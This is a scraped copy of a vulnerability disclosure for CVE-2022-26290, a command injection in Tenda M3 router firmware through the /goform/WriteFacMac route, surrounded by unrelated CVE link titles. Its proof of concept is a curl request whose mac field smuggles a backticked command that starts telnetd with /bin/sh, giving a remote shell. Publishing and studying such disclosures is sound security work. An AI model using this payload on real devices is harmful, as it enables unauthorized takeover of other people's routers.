CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

CVE-2023-6905

CVE-2023-6903

CVE-2023-6904

CVE-2023-3907

Tenda M3 1.10 V1.0.0.12(4856) was discovered to contain a command injection vulnerability via the component /goform/WriteFacMac.

Permalink

Cannot retrieve contributors at this time

**Tenda M3 Command Injection**

**Vender** ：Tenda

**Firmware version**:V1.0.0.12(4856)

**Exploit Author**: GD@hillstone

**Vendor Homepage**: https://www.tenda.com.cn/

**POC**

An issue was discovered in Tenda M3 1.10 V1.0.0.12(4856) devices. An HTTP request parameter is used in command string construction within the handler function of the /goform/WriteFacMac route. This could lead to Command Injection via Shell Metacharacters.

![1](https://github.com/GD008/vuln/raw/main/tenda_M3_WriteFacMac/1.jpg)

When we send packets, the router will be shell

    curl -i -X POST http://192.168.10.1/goform/WriteFacMac -d mac='`telnetd -p 2222 -l /bin/sh`' --cookie "user=admin"
    

![poc](https://github.com/GD008/vuln/raw/main/tenda_M3_WriteFacMac/poc.jpg)

Headline

CVE-2022-26290: vuln/M3_WriteFacMac.md at main · GD008/vuln

CVE: Latest News